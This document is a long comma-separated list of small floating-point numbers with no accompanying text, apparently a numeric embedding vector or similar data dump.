0.003418204141780734, 0.030517200008034706, -0.007249296642839909, -0.0021393464412540197, -0.011633952148258686, 0.020768649876117706, 0.01688092201948166, -0.006098324898630381, -0.03311876207590103, 0.005316394381225109, 0.02964027039706707, 0.0065039051696658134, -0.01444013137370348, -0.04244346171617508, -0.02341405861079693, 0.03551570698618889, 0.03826342523097992, -0.029991041868925095, 0.018254781141877174, 0.034726470708847046, 0.03969574719667435, -0.0008408490102738142, 0.035954173654317856, -0.007965456694364548, 0.013205120339989662, -0.008550077676773071, 0.026731781661510468, -0.0005421443493105471, -0.007351605221629143, -0.0015839567640796304, -0.03724033758044243, 0.021630967035889626, 0.0076439157128334045, -0.03516493737697601, 0.01191895455121994, -0.004359078127890825, 0.03230029344558716, -0.002554061822593212, -0.04220961406826973, -0.005762167740613222, -0.015755528584122658, 0.005206778179854155, -0.01395781897008419, -0.002195981564000249, 0.006891216617077589, -0.005119084846228361, -0.005879092030227184, -0.013168581761419773, 0.015477833338081837, -0.014681287109851837, -0.03922804817557335, 0.0008856090134941041, 0.00825776718556881, -0.0008828685968182981, -0.0005581300938501954, 0.013490122742950916, 0.037912651896476746, -0.004728119820356369, 0.004180037882179022, -0.027506403625011444, -0.007315066643059254, -0.0035040704533457756, 0.008199305273592472, -0.012817809358239174, 0.006851023994386196, -0.008827772922813892, 0.014483978040516376, 0.012693577446043491, -0.003986382391303778, -0.03232952579855919, 0.013862818479537964, 0.013490122742950916, 0.006405250634998083, 0.005257932469248772, -0.012481652200222015, 0.0030984897166490555, 0.018576322123408318, 0.02440791390836239, 0.012298958376049995, -0.001807756838388741, 0.010640096850693226, -0.002692909212782979, -0.009624318219721317, -0.01777246966958046, 0.0015428506303578615, 0.010778944008052349, 0.007570838090032339, -0.015755528584122658, 0.016296302899718285, -0.004702542908489704, -0.0003281640529166907, 0.011546258814632893, -0.009982398711144924, -0.019117096439003944, 0.010435479693114758, 0.0009152967832051218, -0.011188178323209286, 0.005681782495230436, -0.012313573621213436, -0.007417375221848488, 0.0316864438354969, -0.008096996694803238, 0.014469362795352936, 0.013607046566903591, -0.007322374265640974, 0.00704467948526144, -0.011392796412110329, -0.020695572718977928, 0.002239827997982502, -0.009375854395329952, 0.030224891379475594, 0.019248636439442635, -0.0023695407435297966, 0.017246311530470848, -0.004538118373602629, 0.011970109306275845, 0.003019931260496378, -0.012562037445604801, -0.0231071338057518, -0.03414184972643852, 0.011758184060454369, 0.014476669952273369, 0.008557385765016079, 0.006127555854618549, 0.006832754705101252, 0.003865804523229599, 0.014798211865127087, -0.01125394832342863, -0.01057432685047388, -0.026381010189652443, -0.0055100503377616405, -0.031511057168245316, -0.0015492448583245277, -0.0070921797305345535, -0.01992095075547695, -0.010830098763108253, -0.012890886515378952, -0.003074739594012499, -0.010676635429263115, 0.004903506021946669, -0.0075927614234387875, -0.016383996233344078, 0.010128553956747055, -0.010537788271903992, -0.002828102558851242, -0.00934662390500307, 0.012569345533847809, 0.014162437058985233, 0.019511716440320015, -0.025416385382413864, 0.0045271567068994045, -0.006653714459389448, -0.013950511813163757, -0.015127060934901237, 0.0030034889932721853, -0.026804858818650246, -0.019877104088664055, 0.0003044138429686427, -0.0011829434661194682, -0.014425516128540039, 0.004786582197993994, 0.004486964084208012, 0.01055971160531044, -0.0035479168873280287, -0.003460223786532879, 0.005670820828527212, 0.019438639283180237, -0.06150209903717041, -0.0412449911236763, -0.008425845764577389, 0.019438639283180237, 0.015097829513251781, -0.010888560675084591, 0.00808968860656023, -0.013965127058327198, 0.00955124106258154, 0.0045271567068994045, 0.03484339267015457, 0.0004444030928425491, -0.013789741322398186, -0.012094341218471527, 0.01069125160574913, 0.0027458902914077044, -0.007877764292061329, -0.004739081487059593, -0.009448932483792305, 0.02125096321105957, -0.005955823231488466, 0.021177886053919792, -0.0038256116677075624, -0.008155458606779575, -0.014367054216563702, -0.01372397132217884, -0.004771966487169266, -0.0228732842952013, -0.021397117525339127, -0.001806843327358365, -0.02072480320930481, 0.01900017261505127, 0.013497430831193924, 0.018707862123847008, -0.015170907601714134, -0.0012368381721898913, 0.011699722148478031, -0.006576982792466879, 0.009405085816979408, -0.009280853904783726, -0.018883248791098595, 0.007680454757064581, 0.014140513725578785, -0.022303279489278793, -0.0005133700324222445, 0.009324700571596622, 0.0038365733344107866, 0.013322044163942337, 0.00820661336183548, 0.00039895795634947717, 0.006010631565004587, -0.0009655376197770238, -0.00043755205115303397, -0.008323537185788155, 0.013994358479976654, -0.022025585174560547, -0.01955556310713291, 0.016062453389167786, 0.008477000519633293, 0.015141676180064678, -0.005725629162043333, -0.013161273673176765, -0.022785592824220657, 0.00817007478326559, -0.022215586155653, 0.01615014672279358, -0.03162797912955284, 0.004486964084208012, 0.021601734682917595, 0.03089720383286476, 0.015141676180064678, 0.026220237836241722, 0.04247269406914711, -0.0024334837216883898, 0.017743239179253578, 0.01733400486409664, -0.01236472837626934, -0.010135861113667488, 0.013650893233716488, -0.011940877884626389, -0.0005252451519481838, 0.017129385843873024, 0.03434646502137184, 0.03235875442624092, -0.003986382391303778, -0.016822461038827896, 0.02496330440044403, 0.010398941114544868, 0.026936398819088936, 0.0003953040868509561, -0.0011774626327678561, -0.007833917625248432, -0.011392796412110329, -0.014549748040735722, -0.0002025619469350204, 0.018707862123847008, -0.0035990711767226458, -0.005331010092049837, -0.023384828120470047, 0.013453584164381027, -0.01591629907488823, -0.016500920057296753, 0.008104304783046246, -0.007435644511133432, 0.0051556238904595375, 0.0015921780141070485, 0.0008856090134941041, -0.000028460295652621426, 0.013190505094826221, 0.017524005845189095, -0.0017876605270430446, 0.004651388619095087, 0.006306596100330353, 0.0018150645773857832, -0.01620860956609249, 0.01372397132217884, -0.009302777238190174, 0.015799375250935555, 0.0017136693932116032, -0.015360909514129162, 0.01644245721399784, -0.0028682954143732786, -0.02546023204922676, -0.00022859583259560168, -0.01965787075459957, -0.007819302380084991, -0.02135327085852623, -0.009792396798729897, 0.02768179029226303, -0.003767149755731225, 0.023150980472564697, 0.004260423593223095, -0.010179707780480385, 0.00802391953766346, -0.028368718922138214, 0.00857200101017952, -0.0027933907695114613, 0.00039850122993811965, 0.03183259814977646, 0.004340808838605881, 0.028865646570920944, 0.011151639744639397, 0.016530150547623634, 0.015536295250058174, -0.004220230504870415, -0.0060325548984110355, 0.0033049338962882757, -0.031014127656817436, 0.013000503182411194, 0.0009363066055811942, -0.014330514706671238, -0.0023366559762507677, 0.028719492256641388, -0.030751049518585205, -0.004768312443047762, -0.0039388821460306644, -0.011794722639024258, -0.021002499386668205, 0.003622821532189846, 0.014345130883157253, -0.003672148799523711, -0.003368876874446869, -0.022537128999829292, 0.037152644246816635, -0.006880254950374365, 0.019467869773507118, 0.013921280391514301, -0.025138691067695618, 0.017655545845627785, -0.023808678612113, -0.005305432714521885, 0.0038256116677075624, -0.003273875918239355, 0.005590435583144426, 0.01843016780912876, 0.023998679593205452, 0.0058900536969304085, -0.005517357960343361, -0.005433318670839071, -0.006080055143684149, 0.010033552534878254, -0.0040667676366865635, 0.0030582970939576626, -0.02370636910200119, -0.019073249772191048, 0.00041928267455659807, 0.008345460519194603, -0.01172164548188448, 0.005689090117812157, -0.014330514706671238, -0.0006010631914250553, -0.001124481437727809, 0.025504078716039658, 0.004596580285578966, -0.035720326006412506, -0.008045842871069908, -0.023267904296517372, 0.003230029484257102, -0.017787085846066475, 0.02082711271941662, 0.01889786496758461, -0.012277035042643547, 0.009427009150385857, 0.012605884112417698, 0.019745564088225365, 0.01670553721487522, -0.0052469708025455475, -0.00555389653891325, 0.010033552534878254, 0.006211595144122839, -0.005531973671168089, 0.003365222830325365, -0.017553236335515976, 0.006668330170214176, -0.015214754268527031, -0.004647734574973583, 0.009207775816321373, -0.020768649876117706, -0.005521012004464865, -0.03154028579592705, 0.009755858220160007, 0.0012806847225874662, -0.0063212113454937935, 0.0038292657118290663, 0.002384156221523881, -0.019336329773068428, -0.014958982355892658, -0.02201096899807453, 0.00993124395608902, 0.008959311991930008, 0.00808968860656023, -0.002501080511137843, 0.008842388167977333, -0.007033717818558216, -0.00835276860743761, 0.011392796412110329, -0.019935566931962967, 0.032241832464933395, 0.0000633148811175488, -0.01160472072660923, 0.015930913388729095, 0.01438897754997015, 0.00014547006867360324, -0.0014560709241777658, 0.02559177204966545, 0.002289155498147011, 0.009047005325555801, -0.014798211865127087, 0.019950181245803833, -0.010844714008271694, -0.0026673320680856705, 0.014856673777103424, -0.013848203234374523, 0.02692178264260292, -0.014447439461946487, -0.024480992928147316, -0.002444445388391614, -0.0015428506303578615, -0.003851188812404871, 0.009507394395768642, -0.016135532408952713, 0.012211265042424202, 0.0107570206746459, -0.014432823285460472, 0.01869324781000614, -0.017100155353546143, -0.023998679593205452, -0.02930411323904991, 0.020081721246242523, 0.020900189876556396, -0.01620860956609249, 0.004362732172012329, 0.014279360882937908, -0.006039862520992756, -0.005977746564894915, -0.009609702974557877, -0.007885071448981762, 0.010384324938058853, -0.009785088710486889, 0.007570838090032339, 0.006975255906581879, -0.013058965094387531, -0.005590435583144426, -0.009785088710486889, 0.022040201351046562, -0.0003320463001728058, 0.012196649797260761, -0.022785592824220657, 0.011823954060673714, -0.018985558301210403, 0.0075927614234387875, 0.008279690518975258, -0.006756023038178682, -0.023896371945738792, 0.00852084718644619, 0.02423252910375595, -0.00007204993744380772, -0.014783595688641071, 0.003608205821365118, 0.021557888016104698, -0.0160770695656538, -0.007187180686742067, 0.0013428006786853075, 0.016588613390922546, 0.02572331205010414, -0.008769311010837555, 0.01856170780956745, -0.00263627409003675, 0.011626644060015678, 0.012291650287806988, -0.01057432685047388, 0.015609373338520527, -0.026337163522839546, 0.005228701513260603, -0.0021119422744959593, -0.011034715920686722, 0.015857836231589317, -0.013782433234155178, -0.006186017766594887, -0.007019102573394775, -0.04048498347401619, -0.003465704619884491, -0.008835080079734325, -0.013994358479976654, 0.01289819460362196, -0.01226972695440054, -0.013110118918120861, 0.00943431630730629, 0.013322044163942337, 0.01905863545835018, 0.003626475343480706, -0.0023622331209480762, 0.0031898366287350655, -0.011897031217813492, -0.005824283696711063, -0.010983561165630817, 0.005228701513260603, 0.00030624077771790326, 0.036655716598033905, 0.023691754788160324, -0.03189105913043022, 0.008601232431828976, 0.005320048425346613, -0.00107150012627244, -0.008747387677431107, 0.007176219020038843, 0.0035205127205699682, 0.0014597248518839478, -0.018123241141438484, 0.008995851501822472, -0.0008527241297997534, 0.0015008309856057167, 0.002102807629853487, 0.010201631113886833, 0.010223554447293282, -0.002935892203822732, -0.025255614891648293, -0.009807012043893337, 0.018474014475941658, 0.011034715920686722, 0.01344627607613802, 0.011312410235404968, -0.024992534890770912, -0.031949520111083984, -0.007011794485151768, -0.0160770695656538, 0.01263511460274458, -0.01601860672235489, 0.019935566931962967, 0.011619336903095245, 0.015828605741262436, 0.008857003413140774, -0.02182096801698208, -0.044898871332407, -0.007216411642730236, 0.009609702974557877, -0.008820464834570885, 0.027097169309854507, 0.004205615259706974, 0.00019856551080010831, 0.012722807936370373, -0.009953167289495468, 0.000003828723038168391, -0.007673146668821573, 0.0024517530109733343, -0.009638933464884758, 0.018678631633520126, -0.015960145741701126, 0.03256337344646454, -0.011831261217594147, 0.00790699478238821, -0.005122738890349865, -0.0023494444321841, 0.009302777238190174, 0.014681287109851837, 0.00460754195228219, 0.021002499386668205, -0.0014268399681895971, -0.001118087093345821, 0.016763998195528984, -0.00031537548056803644, 0.013533969409763813, -0.002137519419193268, -0.00681448495015502, -0.0006092843832448125, -0.013066273182630539, -0.019774794578552246, -0.008857003413140774, -0.00663909874856472, 0.0024700225330889225, 0.01340973749756813, 0.015930913388729095, -0.000021851910787518136, -0.018576322123408318, -0.00340724247507751, -0.02394021861255169, -0.02185019850730896, -0.00627371110022068, 0.03762034326791763, -0.02002325840294361, 0.0057987067848443985, -0.006445443257689476, -0.0030491624493151903, -0.005214085802435875, 0.0008440461242571473, -0.0027641598135232925, -0.016091685742139816, 0.024656377732753754, 0.004622157663106918, 0.005696398206055164, -0.01568244956433773, 0.004636772908270359, 0.008477000519633293, -0.007987380027770996, 0.010939715430140495, -0.005897361319512129, 0.0035040704533457756, -0.014491286128759384, -0.012328188866376877, -0.01458628661930561, 0.020812496542930603, 0.02122173085808754, 0.000340724247507751, 0.017290158197283745, 0.020242491737008095, -0.017114771530032158, -0.007899687625467777, -0.006361403968185186, -0.007446606177836657, 0.030575662851333618, 0.03525262698531151, -0.007479491177946329, 0.006763330660760403, -0.009609702974557877, 0.017714006826281548, -0.04025113582611084, -0.003120413050055504, -0.01717323251068592, 0.003385319374501705, -0.004253115504980087, -0.021134039387106895, 0.013292813673615456, 0.025606386363506317, 0.018970942124724388, 0.00040763593278825283, -0.013782433234155178, 0.005612358916550875, 0.012021263130009174, 0.010157784447073936, 0.005992362275719643, -0.003942535724490881, 0.0026106969453394413, 0.00820661336183548, -0.01667630486190319, -0.006376019679009914, 0.004359078127890825, 0.015141676180064678, -0.010523173026740551, -0.0018351608887314796, -0.05130046606063843, 0.021104807034134865, 0.0033889731857925653, 0.02341405861079693, 0.01886863261461258, -0.004728119820356369, -0.005572166293859482, 0.002290982287377119, -0.015243984758853912, 0.00703737186267972, 0.0036063790321350098, -0.01571168191730976, -0.00017127559112850577, -0.007782763335853815, -0.011626644060015678, -0.019073249772191048, 0.025986390188336372, 0.005915630608797073, -0.003869458334520459, 0.0065550594590604305, 0.0008604886243119836, 0.022756360471248627, -0.02185019850730896, -0.0029066610150039196, 0.011363564990460873, 0.017655545845627785, -0.01422089897096157, 0.002287328476086259, -0.021894045174121857, -0.01042817160487175, -0.006171402521431446, -0.0031496440060436726, -0.0019877103623002768, 0.003142336383461952, -0.001756602548994124, 0.0007234681397676468, -0.014133205637335777, -0.04375886172056198, 0.013066273182630539, -0.004318885505199432, -0.000638058700133115, 0.017553236335515976, 0.01740708202123642, -0.00041768408846110106, -0.010318555869162083, -0.007285835687071085, -0.010749713517725468, 0.008053150027990341, -0.020271722227334976, -0.02665870450437069, 0.0016807845095172524, -0.016193993389606476, 0.017714006826281548, 0.019701717421412468, -0.00015677425835747272, 0.010238169692456722, -0.007377182599157095, 0.0009061620803549886, 0.0013765990734100342, -0.007950841449201107, 0.011005484499037266, 0.022595589980483055, -0.041391145437955856, -0.010903175920248032, -0.009945860132575035, -0.012350112199783325, 0.009609702974557877, -0.011502412147819996, -0.007084872107952833, -0.00636505801230669, 0.007347951643168926, 0.011853184551000595, 0.004132537636905909, -0.012693577446043491, -0.023253288120031357, -0.007848532870411873, 0.001962133217602968, -0.02135327085852623, 0.01989172026515007, 0.015156291425228119, -0.009507394395768642, -0.006160440854728222, -0.010121245868504047, -0.006734099704772234, -0.0024353107437491417, -0.004128883592784405, 0.009682780131697655, -0.02765255980193615, -0.006036208942532539, -0.01902940310537815, 0.000928085355553776, 0.003569840220734477, 0.01628168672323227, 0.021528657525777817, -0.0042786928825080395, -0.014615518040955067, 0.0024170412216335535, 0.009244315326213837, 0.01273011602461338, 0.0011646740604192019, -0.009799704886972904, -0.007472183555364609, 0.0375911109149456, -0.010267401114106178, -0.008235843852162361, 0.009675472974777222, -0.00754160713404417, -0.010567019693553448, -0.006525828503072262, -0.002482810989022255, 0.015024752356112003, -0.014052820391952991, 0.018649401143193245, 0.018824785947799683, 0.002795217791572213, -0.029464883729815483, -0.026483317837119102, 0.007680454757064581, 0.008031226694583893, 0.010786252096295357, 0.012920117937028408, -0.019175559282302856, 0.0146228251978755, -0.014966290444135666, 0.01376050990074873, -0.03034181520342827, -0.014396284706890583, 0.001857997733168304, -0.012130879797041416, -0.011232024990022182, 0.004227538593113422, 0.02543100155889988, 0.021557888016104698, -0.044548097997903824, -0.012277035042643547, 0.00488158268854022, -0.00921508390456438, -0.04054344445466995, -0.01271550077944994, 0.0010404421482235193, 0.011115101166069508, -0.01740708202123642, -0.024948688223958015, -0.023779448121786118, -0.002448099199682474, 0.014067435637116432, -0.00808968860656023, 0.005612358916550875, -0.00006308651063591242, -0.012934733182191849, -0.007885071448981762, -0.01271550077944994, 0.005619666539132595, -0.026132546365261078, 0.01750938966870308, -0.0004786582139786333, -0.024992534890770912, 0.0412449911236763, -0.02592792920768261, 0.0021685773972421885, 0.008082381449639797, 0.01680784486234188, 0.003367049852386117, 0.005320048425346613, 0.000979239703156054, -0.012211265042424202, 0.0007805600180290639, -0.009624318219721317, 0.006076401565223932, -0.03563263267278671, -0.0025065613444894552, -0.008615847676992416, -0.0160770695656538, -0.018547091633081436, 0.013497430831193924, -0.02022787556052208, 0.004417540039867163, 0.0006156786694191396, 0.005893707275390625, -0.004117921926081181, 0.01011393778026104, -0.03314799442887306, -0.013438968919217587, -0.004041190724819899, -0.008973928168416023, -0.0065842908807098866, 0.0014003493124619126, 0.007914302870631218, -0.0093977777287364, 0.005038699600845575, -0.01601860672235489, 0.0033487805631011724, -0.007811994291841984, -0.0007193575147539377, -0.008491615764796734, 0.003420031163841486, 0.0008234930573962629, -0.00026604809681884944, -0.0026033890899270773, -0.018342474475502968, -0.006938716862350702, -0.01390666514635086, -0.008031226694583893, -0.0009564029169268906, -0.011173563078045845, -0.030809510499238968, -0.00677063874900341, -0.0038767659571021795, 0.005557550583034754, 0.005232355557382107, 0.030049504712224007, -0.00789237953722477, 0.00695333257317543, 0.009149313904345036, -0.008250460028648376, -0.002046172507107258, 0.026381010189652443, -0.016091685742139816, -0.01584322191774845, 0.0019164597615599632, -0.008104304783046246, -0.013782433234155178, -0.0032318562734872103, -0.005433318670839071, -0.007497760467231274, 0.005751206073909998, -0.012196649797260761, -0.002161269774660468, 0.016617843881249428, 0.011933569796383381, 0.004165422637015581, 0.0015035714022815228, -0.0006636358448304236, 0.022127894684672356, 0.003175221150740981, 0.01271550077944994, 0.017845546826720238, 0.008272383362054825, 0.022858669981360435, -0.007333335932344198, -0.007614684756845236, -0.026381010189652443, 0.04226807877421379, -0.0005590435466729105, -0.0043298471719026566, -0.0017164098098874092, 0.015112445689737797, 0.0003475752891972661, 0.008323537185788155, 0.005795052740722895, 0.015507063828408718, -0.026834091171622276, -0.028354104608297348, 0.009098160080611706, 0.00011327026004437357, 0.01717323251068592, -0.005473511293530464, -0.01856170780956745, -0.0031057975720614195, -0.007760840002447367, -0.0008477000519633293, 0.014659363776445389, -0.011473181657493114, 0.015229369513690472, -0.006408904679119587, 0.00026102401898242533, -0.009792396798729897, -0.041858844459056854, 0.021031729876995087, 0.011312410235404968, 0.013402429409325123, -0.011911646462976933, 0.0059667848981916904, 0.024115603417158127, 0.0011655875714495778, 0.0029833924490958452, -0.027623329311609268, -0.010618173517286777, -0.0012121745385229588, -0.010187015868723392, -0.0026527163572609425, -0.007731609046459198, 0.0036374370101839304, 0.014564363285899162, 0.0046185036189854145, 0.004651388619095087, 0.006474674213677645, 0.012160110287368298, 0.010201631113886833, -0.00505696889013052, -0.015214754268527031, -0.020564032718539238, 0.020169414579868317, -0.011802030727267265, 0.0040959990583360195, 0.004687927197664976, 0.010618173517286777, -0.0029980081599205732, -0.0017456408822908998, -0.010669328272342682, 0.027272555977106094, 0.017582468688488007, 0.016164762899279594, 0.0142720527946949, 0.00635775038972497, -0.009617011062800884, -0.004260423593223095, 0.009339315816760063, -0.006595252547413111, -0.0129128098487854, 0.007274874020367861, -0.006394288968294859, -0.004611195996403694, -0.0004955573822371662, 0.012189341709017754, -0.004804851487278938, -0.02354559861123562, 0.0036922451108694077, -0.013607046566903591, -0.003211759962141514, -0.04492809996008873, 0.024612531065940857, 0.0031112784054130316, 0.0021850198972970247, 0.0015793893253430724, 0.0011281352490186691, 0.002720313146710396, 0.02205481566488743, -0.04177115112543106, 0.0033031071070581675, -0.007483145222067833, 0.0016853518318384886, 0.02553330920636654, 0.0016862653428688645, 0.012576652690768242, 0.022960977628827095, -0.01259857602417469, 0.007209104020148516, -0.010150477290153503, -0.004256769549101591, -0.015930913388729095, 0.006131209898740053, -0.018284013494849205, -0.019482485949993134, 0.014030897058546543, 0.016193993389606476, -0.007062948774546385, 0.00019810876983683556, -0.0064783282577991486, -0.00820661336183548, 0.007333335932344198, 0.0001644245785428211, -0.01790400967001915, -0.005130046512931585, -0.001563860336318612, 0.0059412079863250256, 0.018020933493971825, 0.03747418895363808, 0.0036246483214199543, 0.015974760055541992, 0.0154193714261055, 0.0012386650778353214, 0.004026575013995171, -0.023764831945300102, -0.012890886515378952, -0.007680454757064581, -0.0046038879081606865, -0.018883248791098595, -0.000014672609722765628, -0.014966290444135666, 0.004366385750472546, 0.00273127481341362, 0.02984488755464554, -0.002491945866495371, 0.018590938299894333, -0.013826279900968075, -0.016924768686294556, -0.032241832464933395, 0.0038329195231199265, 0.0018296801717951894, -0.010698558762669563, -0.0016981404041871428, -0.007738916669040918, 0.01041355635970831, -0.025708695873618126, -0.0001838358148233965, 0.003421858185902238, -0.00654775183647871, 0.019175559282302856, -0.009441624395549297, -0.004234846215695143, -0.003756188089028001, -0.005020430311560631, 0.018488630652427673, -0.01488590519875288, -0.013205120339989662, -0.022259432822465897, 0.014666671864688396, -0.005513703916221857, -0.0197309497743845, -0.025182537734508514, 0.004311577882617712, -0.002108288463205099, 0.014293976128101349, 0.0031003167387098074, 0.013343967497348785, 0.023954832926392555, -0.004106960259377956, -0.008988543413579464, 0.0174363125115633, 0.0009335661889053881, -0.006379673257470131, -0.003604552010074258, -0.008776618167757988, 0.005681782495230436, 0.005312740802764893, -0.014725133776664734, -0.00893738865852356, 0.00039987143827602267, -0.0013016945449635386, 0.0043700397945940495, 0.0029030072037130594, 0.0001756145793478936, -0.0004439463373273611, -0.007154295686632395, -0.004486964084208012, -0.009222391992807388, 0.015697065740823746, 0.011217409744858742, -0.005232355557382107, -0.01394320372492075, 0.003120413050055504, 0.00009711326129036024, 0.010128553956747055, 0.021762505173683167, -0.01581398956477642, 0.006313903722912073, 0.0038767659571021795, -0.00021192501299083233, 0.012328188866376877, -0.014695903286337852, -0.008645079098641872, -0.015390140004456043, 0.009945860132575035, 0.013037041760981083, -0.0031386823393404484, -0.0009883743477985263, -0.006394288968294859, 0.023662522435188293, 0.0208563432097435, 0.002108288463205099, -0.003924266435205936, -0.01430859137326479, 0.007526991423219442, 0.017860163003206253, -0.011685105971992016, -0.009704703465104103, -0.000928542111068964, 0.0022325203754007816, 0.008228536695241928, -0.0003512291586957872, 0.011027407832443714, -0.011728952638804913, -0.00401195976883173, -0.0035935903433710337, 0.016383996233344078, -0.012079725041985512, -0.0008888061856850982, -0.005002161022275686, 0.021864814683794975, 0.0030363737605512142, 0.005630628205835819, -0.0154193714261055, 0.01889786496758461, 0.0006147652165964246, 0.005477165337651968, -0.00545524200424552, -0.0021302117966115475, 0.003851188812404871, -0.008235843852162361, -0.0033579152077436447, -0.03063412569463253, -0.0059265922755002975, -0.011926262639462948, 0.014293976128101349, -0.007431990932673216, -0.004932737443596125, 0.0012587615055963397, 0.016822461038827896, 0.00921508390456438, 0.018079394474625587, 0.019087865948677063, 0.003372530685737729, -0.009690088219940662, 0.006438135635107756, 0.010852022096514702, -0.019438639283180237, -0.00019616764620877802, -0.0021923277527093887, 0.008053150027990341, 0.0059814006090164185, -0.0008614020771346986, -0.0071981423534452915, 0.0008033967460505664, 0.01913171261548996, -0.018152473494410515, 0.006025247275829315, 0.006525828503072262, 0.008630462922155857, -0.0015218408079817891, 0.0045125409960746765, 0.013468199409544468, -0.015404755249619484, -0.007936226204037666, -0.003032719949260354, 0.0017922278493642807, 0.0071469880640506744, -0.009514701552689075, -0.040368061512708664, -0.013197812251746655, 0.01340973749756813, 0.03873112052679062, -0.005619666539132595, 0.016383996233344078, 0.0398419015109539, -0.007702377624809742, 0.012189341709017754, -0.019950181245803833, 0.03364492207765579, -0.007768147625029087, 0.017714006826281548, 0.0147178266197443, -0.008491615764796734, -0.0038365733344107866, 0.0020754034630954266, 0.011699722148478031, -0.0005037786322645843, -0.009427009150385857, 0.004000998102128506, -0.001173808821476996, -0.018020933493971825, -0.0007129632285796106, 0.0000513255872647278, -0.02440791390836239, -0.012642422690987587, 0.001371118240058422, 0.008842388167977333, -0.0000699375377735123, 0.021192500367760658, -0.006233518477529287, -0.024261759594082832, -0.0078046866692602634, -0.008374691940844059, 0.016500920057296753, 0.001709102070890367, 0.01321242842823267, 0.0022087700199335814, 0.005809668451547623, -0.01902940310537815, 0.02453945390880108, 0.005053315311670303, 0.008330845274031162, -0.0030546432826668024, 0.014213590882718563, -0.025007151067256927, 0.004611195996403694, 0.005816976074129343, 0.0016259762924164534, 0.022200971841812134, 0.028091024607419968, 0.009178545325994492, -0.0010331344092264771, -0.03504801169037819, 0.010486633516848087, 0.007114103063941002, -0.020037874579429626, -0.014710518531501293, -0.016500920057296753, -0.01976018026471138, 0.009660856798291206, 0.015214754268527031, -0.006481982301920652, 0.004918121732771397, 0.004245807882398367, 0.004242153838276863, -0.02559177204966545, 0.0013117427006363869, -0.008674309588968754, 0.031218746677041054, 0.004041190724819899, -0.009748550131917, -0.010223554447293282, 0.010735097341239452, -0.0029450268484652042, -0.01104202400892973, -0.005652551539242268, 0.015521680004894733, -0.013475507497787476, 0.0031441631726920605, 0.025182537734508514, -0.005243316758424044, -0.01092509925365448, 0.005652551539242268, -0.0029541614931076765, -0.010282016359269619, -0.017129385843873024, 0.00010961638326989487, 0.007505068555474281, 0.0070008328184485435, 0.00789237953722477, 0.005893707275390625, -0.0028609875589609146, -0.019906334578990936, 0.008769311010837555, -0.0076073771342635155, 0.0030875280499458313, 0.016471687704324722, -0.029347959905862808, -0.02111942321062088, -0.0036008981987833977, -0.007344297599047422, 0.026468701660633087, 0.026483317837119102, 0.0015492448583245277, 0.006514866836369038, -0.024451760575175285, 0.0003859410062432289, -0.005159277934581041, -0.007315066643059254, -0.010267401114106178, -0.012554729357361794, 0.007373528555035591, -0.002106461441144347, 0.0054296646267175674, 0.0003569383407011628, -0.0059412079863250256, 0.012752039358019829, 0.009785088710486889, -0.007870456203818321, -0.0031057975720614195, -0.027272555977106094, -0.0028080062475055456, -0.010698558762669563, -0.01819632016122341, -0.016457073390483856, 0.0026728129014372826, -0.01806478016078472, -0.028851032257080078, 0.0026015620678663254, -0.007826609537005424, 0.009719319641590118, -0.021908661350607872, -0.001615014742128551, -0.000781473470851779, -0.015667835250496864, 0.017480159178376198, 0.014052820391952991, -0.0034035886637866497, 0.027901023626327515, 0.007665839046239853, 0.002338482765480876, -0.03513570502400398, 0.013270890340209007, -0.0009719319059513509, 0.0187955554574728, 0.006916793528944254, -0.013490122742950916, 0.003695898922160268, 0.010084707289934158, -0.0009148400858975947, 0.014995520934462547, -0.006098324898630381, -0.0015218408079817891, 0.004128883592784405, 0.0013765990734100342, -0.007585453800857067, -0.0022836746647953987, 0.0201547984033823, 0.004651388619095087, -0.013037041760981083, 0.017743239179253578, 0.003365222830325365, -0.0007061121868900955, -0.00331954937428236, 0.007004486862570047, 0.012262419797480106, 0.00042590530938468874, 0.007972764782607555, 0.011020100675523281, 0.0022690591868013144, 0.010983561165630817, 0.00035602488787844777, 0.02417406626045704, 0.0080385347828269, -0.03411261737346649, -0.00888623483479023, -0.019175559282302856, -0.010135861113667488, 0.006993525195866823, -0.019774794578552246, 0.03116028383374214, 0.012496267445385456, 0.0020352108404040337, -0.015258600004017353, 0.007176219020038843, 0.0025485809892416, 0.01654476672410965, 0.00022083133808337152, -0.010070092044770718, 0.0023805024102330208, -0.009390470571815968, -0.019204789772629738, -0.0012167418608441949, 0.004538118373602629, -0.007051987107843161, 0.0017885739216580987, 0.010654712095856667, -0.012642422690987587, 0.0033834923524409533, -0.0037963807117193937, 0.020213261246681213, -0.009098160080611706, -0.012225880287587643, 0.02211327850818634, -0.005206778179854155, -0.02608869969844818, 0.008425845764577389, 0.02132404036819935, 0.016822461038827896, -0.01939479261636734, -0.00428600050508976, -0.013585123233497143, 0.0039023433346301317, -0.020271722227334976, -0.0021923277527093887, -0.013336660340428352, -0.004410232417285442, 0.017611699178814888, -0.007139680441468954, 0.0015437640249729156, 0.022157125174999237, 0.0024353107437491417, -0.017187848687171936, 0.0028555067256093025, 0.013585123233497143, -0.005327356047928333, 0.02025710791349411, 0.00392792047932744, -0.003628302365541458, 0.000681448495015502, 0.022785592824220657, 0.02569407969713211, -0.0032062791287899017, 0.019687103107571602, -0.013555892743170261, 0.004538118373602629, -0.024393299594521523, 0.012028571218252182, -0.02569407969713211, 0.029932580888271332, 0.012642422690987587, 0.016559381037950516, -0.02472945675253868, -0.020549418404698372, 0.01657399721443653, -0.013051657006144524, -0.013585123233497143, -0.01259857602417469, 0.011166255921125412, -0.003416377352550626, -0.008659694343805313, -0.002044345485046506, -0.00893738865852356, -0.026205623522400856, -0.015477833338081837, 0.006368712056428194, -0.0050642769783735275, 0.025650233030319214, -0.012342805042862892, -0.0028518529143184423, 0.010683943517506123, 0.01565321907401085, 0.011911646462976933, -0.022902516648173332, -0.010165092535316944, -0.0052469708025455475, -0.0034346466418355703, -0.009470855817198753, -0.0280764102935791, 0.010457403026521206, 0.01601860672235489, -0.001460638246499002, 0.013797048479318619, 0.0008198391878977418, -0.014432823285460472, 0.0011902512051165104, 0.003014450427144766, 0.0005330096464604139, 0.018488630652427673, 0.0034876279532909393, 0.0001547189604025334, -0.011319718323647976, 0.0007431077538058162, -0.006036208942532539, -0.008191998116672039, -0.03183259814977646, 0.006843716371804476, 0.020213261246681213, 0.010881252586841583, 0.0037306109443306923, 0.02966950088739395, 0.007417375221848488, -0.007695070002228022, 0.02337021194398403, 0.0026600242126733065, -0.010479326359927654, 0.007073910441249609, -0.005626974161714315, -0.00852084718644619, 0.019643256440758705, 0.019336329773068428, -0.008184690028429031, 0.008762002922594547, -0.004592926241457462, -0.0005476251826621592, -0.0014889558078721166, 